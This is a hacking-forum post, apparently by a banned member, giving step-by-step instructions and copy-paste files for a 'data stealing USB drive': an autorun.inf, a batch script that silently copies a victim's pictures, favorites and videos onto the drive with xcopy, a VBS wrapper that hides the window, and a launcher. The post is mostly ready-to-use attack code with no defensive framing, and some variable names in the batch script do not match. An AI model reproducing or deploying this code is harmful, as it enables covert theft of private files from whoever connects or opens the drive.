Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 321

How to create data stealing USB drive

by VandalRevenge - 27 August, 2022 - 12:39 AM
This post is by a banned member (VandalRevenge) - Unhide
561
Posts
2
Threads
2 Years of service
#1
| MADE BY: Zekz#5479 |

STEP # 1
Open Notepad (I recommend Notepad++) and copy-paste the following lines.
-
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Save this as autorun.inf
-
STEP # 2
Open Notepad again and copy-paste the following lines

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls
Save this as file.bat
-
STEP # 3
Open Notepad once again and copy-paste the following line.

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Save this as invisible.vbs


STEP # 4

Open Notepad one last time and copy-paste the following line.

wscript.exe \invisible.vbs file.bat

Save this as launch.bat
This post is by a banned member (KittySkittle) - Unhide

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)